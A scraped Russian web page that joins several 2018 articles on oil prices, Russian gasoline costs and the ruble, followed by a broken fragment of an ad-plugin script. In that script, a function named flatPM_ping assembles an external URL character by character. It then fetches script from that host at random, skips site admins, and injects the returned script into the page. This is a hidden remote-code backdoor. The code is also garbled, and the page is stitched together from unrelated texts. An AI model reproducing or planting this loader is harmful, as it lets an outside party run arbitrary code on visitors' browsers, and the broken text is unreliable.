Текущее положение дел в мировом экономическом секторе влечет за собой кредитные коллапсы, и авторитетные эксперты единогласны в следующем мнении: если ситуация продолжит развиваться в том же духе, то на стремительный рост цен на нефть рассчитывать не следует. Есть также эксперты, полагающие, что стоимость нефти еще не достигла пока «дна».

И вопрос они ставят здесь так: в ближайшее время мир столкнется с полной деградацией глобальной экономики и с разрушением добывающей нефть отрасли.

Цены на «черное золото» будут напрямую зависеть при этом от соотношения скоростей данных процессов.

Подводя итоги, следует отметить, что за повышение стоимости углеводородного сырья выступают в настоящее время все-таки намного больше факторов, нежели за снижение цен.

Нефтяные котировки сейчас уверенно растут, и подавляющее большинство независимых аналитиков придерживаются мнения о том, что их рост мы будем наблюдать и в дальнейшем. Китай намерен перевернуть мировой рынок нефти

Источник: https://pronedra.ru/industry/oil/2018/02/17/kakie-faktoryi-vliyayut-na-tsenoobrazovanie-nefti-ili-pochemu-syire-seychas-dorozhaet-210663.html

5 причин почему в России дорогой бензин и когда он подешевеет

Россия является самой богатой природными ресурсами страной в мире. У нас добывают черный, цветной, полудрагоценные и драгоценные металлы, газ, нефть. Логично предположить, что страна с таким запасом природных ресурсов должна процветать. И уровень жизни населения должен быть высоким. Это, к сожалению, не так.

Мы не ОАЭ и не Катар, где правительство грамотно использует доходы от нефтегазовой промышленности. Более того, у нас, несмотря на то, что страна является одним из крупнейших экспортеров нефти, бензин очень дорогой.

Вряд ли автомобилисты со стажем могут вспомнить момент, когда бензин и другое топливо дешевело. Оно только дорожает даже, когда расценки на нефть на мировом рынке падают. Странно и нелогично с учетом того, что нефти у нас в стране очень много. Тем не менее, бензин только дорожает.

Мнения большинства экспертов в данном вопросе сходятся. Пора разобраться, почему происходит рост цен на бензин.

Это последствия антикризисных мер правительства

«Когда правительство активно начинает регулировать топливный рынок, это со временем приводит к повышению цен на топливо, что характерно в периоды экономических кризисов. Так было в 1996-м, 2000-м, 2008-м годах.

Аналогичная ситуация наблюдалась и в 2014-м году, когда курс рубля резко упал по отношении к евро и доллару. Намерения правительства благие, направлены на то, чтобы предотвратить возникновение дефицита бензина на рынке.

И им это удавалось.

Но, со временем, когда ситуация становилась менее обостренной, правительство забывало вернуться к естественному рыночному механизму. Такое происходит и сейчас. В 2015-м году правительство искусственно удерживало цены на бензин на определенном уровне, чтобы он не подорожал резко.

В итоге был и такой период, когда в России стоимость топлива была самой низкой в Европе. Казалось бы, это хорошо. Низкие цены на бензин сделали отечественный рынок неинтересным для иностранных поставщиков топлива.

Не весь объем используемого в нашей стране топлива производится в России. Его экспортируют из Финляндии, Белоруссии для регионов СЗО, из некоторых азиатских стран.

Из-за низких, непривлекательных цен вышеперечисленные страны перестали поставлять его на отечественный рынок.

Со временем это привело к дефициту, который наблюдается и сейчас. Предложения на рынке мало, а спрос большой. Объемы потребления топлива возросли за последние годы. На этом фоне стоимость повысилась».

Так ответил, почему в России дорогой бензин Рустам Танкаев, член комитета Торгово-промышленной палаты РФ по энергетической стратегии и развитию ТЭКа.

Во всем виноват экспорт и высокие налоги

«В начале 2018 года повысился налог НДПИ и топливный акциз. Несмотря на то, что правительство подумывает снизить акциз на несколько процентов, это не улучшит ситуацию.

Ведь с начала следующего года повышается НДС на 2%, поэтому снижение акциза погоды не делает. Налоги определенно высокие. Причина их повышения — дефицит бюджета.

Правительство можно понять с одной стороны, но последствия таких решений негативно сказываются в целом на экономической ситуации.

Экспорт — еще одна причина. На российском рынке производят мало бензина. Нефтедобывающим компаниям намного выгоднее продавать черное золото за границу, потому что они быстро получают свою прибыль без дополнительной головной боли. С каждой тонны отправленного за границу топлива Аи-92, получают дополнительные 5990 рублей. Это и является главным мотивом экспортеров».

Так ответит Евгений Аркуша, президент Московской топливной ассоциации и Российского топливного союза на вопрос, почему растут цены на бензин.

Никаких резких скачков не будет

«Резких скачков цен на бензин быть не должно. Повышение стоимости связано с увеличением акцизов и инфляцией. По предварительным прогнозам, рост цен на бензин и остальное топливо к концу года будет на уровне инфляции».

Так ответит Александр Новак, министр энергетики РФ, когда его спросили, будет ли дорожать бензин.

Это был единичный скачок цен

«Скачков в ближайшее время можно не ожидать. Почему подниматься бензин стал в начале этого года? Весной 2018 рост цен был обусловлен сразу рядом факторов.

Наконец, нефть начала расти в цене и добралась до отметки 80 $ за баррель, поставила рекорд за последние 3 года. Отечественные нефтедобывающие компании на этом фоне стали активно экспортировать ее, чтобы увеличить долларовую прибыль, оставив совсем немного топлива для внутреннего бензинового рынка, что способствовало возникновению дефицита.

При этом весной спрос на топливо резко возрастает, потому что активнее осуществляются транспортные перевозки, люди начинают пользоваться больше своими личными авто, ездят на дачи, на море, другие поездки.

Повысился спрос, но предложения было не так много, и акцизы с налогами поднялись. Производители и продавцы воспользовались этой возможностью, чтобы увеличить стоимость товара.

Однако этим быстро заинтересовались в ФАС.

Сейчас ситуация стабилизировалась и до конца года таких резких скачков не предвидится. В июле акцизы планировалось еще раз поднять. Правительство не стало этого делать, чтобы не допустить еще большего роста цен. Было решено уменьшить их на 3000 для тонны бензина».

Александр Просвиряков, инвест-банкир

Виноват экспорт и отсутствие должного правительственного контроля

«Необходим более жесткий контроль со стороны правительства. Нефть выгоднее продавать, чем оставлять на внутреннем рынке для не очень платежеспособного потребителя. В прошлом году рост цен на внутреннем рынке составил 14,4%. Это в несколько раз больше уровня инфляции.

Высоки риски, что к концу этого года стоимость бензина будет равна 56 рублей.

Это приведет к резкому скачку цен на продукты, услуги, чего допускать нельзя в условиях нестабильной экономической ситуации, когда платежеспособность граждан снизилась.

Само правительство делает так, чтобы больший объем добываемой нефти уходил на экспорт, не особо интересуясь тем, как дела обстоят на внутреннем рынке.

Сначала необходимо насытить нефтепродуктами внутренний рынок, сделав их доступными и качественными, даже, если придется принимать жесткие меры в отношении добывающих компаний. Это может быть внедрение акцизов на экспортируемую нефть и повышение действующих экспортных пошлин».

Борис Титов, бизнес-омбудсмен, открыто заявил, что цена на бензин поднимается и это не остановить!

Правительство лишиться существенной статьи дохода

«Почему дорожает бензин в России? Наше государство сильно зависит от природных нефтегазовой промышленности, потому что большая часть поступлений идет именно от продажи этих ресурсов. Налог на добычу природных ископаемых в последние годы несколько раз повышался, как и акцизы на топливо. Отмечается дефицит бюджета.

Санкции, резкое ослабление курса рубля и возникший экономический кризис, ужесточение налоговой политики в отношении бизнеса только обострили ситуацию. Поступления в бюджет сокращаются.

И правительство не может лишиться главного источника — нефтегазовой промышленности. Поэтому снижение налогов сейчас для бюджета сродни смерти. Именно налоги влияют на ценообразование бензина. Этим и обусловлен рост цен.

75% от стоимости бензина составляют налоги, который производитель платит в бюджет».

Дмитрий Махонин, глава управления контроля ТЭК ФАС

Про печатную фабрику Гознак можно узнать тут

Императорский монетный двор: http://lopatnik.info/budget/other-budget/imperatorskij-monetnyj-dvor.html

Смотрите видео о том, как Путин объяснил, почему в России растут цены на бензин:

Источник: https://lopatnik.info/budget/other-budget/v-rossii-rastut-ceny-na-benzin.html

Нефть растет, доллар падает — медовые годы возвращаются? Разбираемся с экономистом, что происходит

Баррель нефти марки Brent устойчиво растет уже который день. Вот-вот дойдет до $80 за баррель, а в будущем прогнозируют и $100.

Прямо как накануне российского кризиса 2014 года, когда баррель черного золота торговался по $100—115, а доллар стоил 32 рубля. Белорусы помнят те времена по курсу доллара в 9520 неденоминированных рублей.

Вернется ли все обратно? Разбираемся со старшим аналитиком «Альпари» Вадимом Иосубом.

— Сегодняшние торги на бирже закончились резким укреплением российского рубля и проседанием доллара. В чем причины?

— Просто так у нас российский рубль не растет. Каких-то специфических белорусских причин для того, чтобы российский рубль укрепился к белорусскому, нет и быть не может. 90% того, что происходит на белорусском валютном рынке, — это пассивная реакция на происходящее во внешнем мире, на то, как ведет себя евро по отношению к доллару, как доллар ведет себя по отношению к российскому рублю.

— Российский рубль на торгах в Москве вчера серьезно укрепился и к доллару, и к евро. Сегодня это укрепление продолжилось. В частности, на Московской бирже курс доллара снизился до уровней 20 апреля, курс евро — до уровней 9 апреля.

Это как раз тот самый понедельник после введения последних крупных американских санкций. По сути, евро в России пытается снизиться к досанкционным уровням.

 В Беларуси российский рубль просто отыграл вчерашнее укрепление и продолжает реагировать на сегодняшний рост российского рубля по отношению к доллару и евро на Московской бирже.

— Во всем виновата нефть или что-то еще?

— В первую очередь это реакция на рост нефти. Сюда же можно добавить несколько геополитических причин. Во-первых, обострение отношений США и Ирана и уже состоявшийся выход США из ядерного соглашения с Ираном.

Буквально вчера США выдвинули серьезный ультиматум Ирану из 12 пунктов. Но похоже, что ни один из них Иран не собирается выполнять.

В случае невыполнения, которое на сегодняшний день выглядит единственным сценарием, Америка пообещала серьезные санкции, в том числе и нефтяное эмбарго.

— В этом случае возможен дальнейший рост нефтяных цен. Но тут во многом ситуация будет зависеть не от американского эмбарго против Ирана, здесь очень большая интрига в том, как себя будут вести третьи страны. Тот же Китай, он и раньше игнорировал это эмбарго, но раньше Европа поддерживала санкции против Ирана.

Сейчас Европа сказала о том, что эти санкции поддерживать не будет и продолжит сотрудничество с Ираном. Вопрос, последуют ли вторичные санкции, то есть будет ли Америка наказывать те европейские компании, которые этим санкциям не подчинятся.

Несмотря на то, что Европа на политическом уровне эти санкции не поддерживает, отдельные европейские компании, включая французский Total, говорят, что будут выходить из нефтяных проектов с Ираном. В общем, неопределенность большая.

— Но цены на нефть продолжат расти? Как думаете, до какой отметки? Есть прогноз, что в нынешнем году они достигнут $100.

— Расти они будут однозначно. Но по поводу $100 остается только гадать, так как совершенно непонятно, во что выльются эти санкции и как себя поведет Европа и европейские компании. А от этого зависит, насколько сократится поступление иранской нефти на европейский рынок.

— Прогноз по цене нефти в $100 за баррель всем вселяет какую-то надежду на то, что поднимется российская экономика до докризисного состояния, а за ней и белорусская. Возможно ли это?

— Дорогая нефть, безусловно, улучшает ситуацию в российской экономике, а за ней и в белорусской. Причем улучшает и напрямую, за счет роста цен на нефтепродукты, которые мы продаем, и опять же мы будем пользоваться ростом российской экономики: поставлять туда машины, оборудование и так далее. Но что тут важно понимать.

Сейчас цены на сырье в мире постоянно колеблются. Даже при сценарии, когда нефть будет стоить по $100, нет ни малейшей гарантии, что цена останется на этом уровне. Но даже не в этом суть. Основывать долгосрочное и устойчивое развитие экономики только лишь на высоких ценах сырья невозможно.

То есть серьезные белорусские экономические проблемы, касающиеся плохой структуры экономики, неэффективного управления госсектором, устойчиво убыточных предприятий высокая цена на нефть не решит, эти проблемы вообще никак не связаны с ценой на сырье и не зависят от нее.

Да, убыточные предприятия можно залить деньгами на некоторое время, но это просто загнать проблему вглубь.

— То есть не ждать сильного подъема в экономике — роста зарплат и так далее?

— Это может быть короткий период улучшения внешней конъюнктуры. Да, на этом периоде могут вырасти и зарплаты. Но за ним последует ухудшение мировой конъюнктуры и падение уровня жизни. Если мы говорим о росте зарплат и росте ВВП, в экономике важен не просто рост, а важно, чтобы этот рост был устойчивый.

Проблема белорусской экономики — это своеобразные качели, когда доходы и уровень жизни рисуют синусоиду. К примеру, выросли до $500, упали до $300, выросли до $600, потом снова упали до $300. Важен ведь не просто рост до какой-то планки, за которым последует очередное падение.

Важно, чтобы этот рост стал устойчивым, чтобы зарплаты достигли какого-то уровня и больше уже не падали. Но надежды на нефтяной рынок нам в этом не помогут.

Кошельки в каталоге Onliner.by

Наш канал в Telegram. Присоединяйтесь!

Быстрая связь с редакцией: читайте паблик-чат Onliner и пишите нам в Viber!

Источник: https://people.onliner.by/2018/05/22/ekonomika-22

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};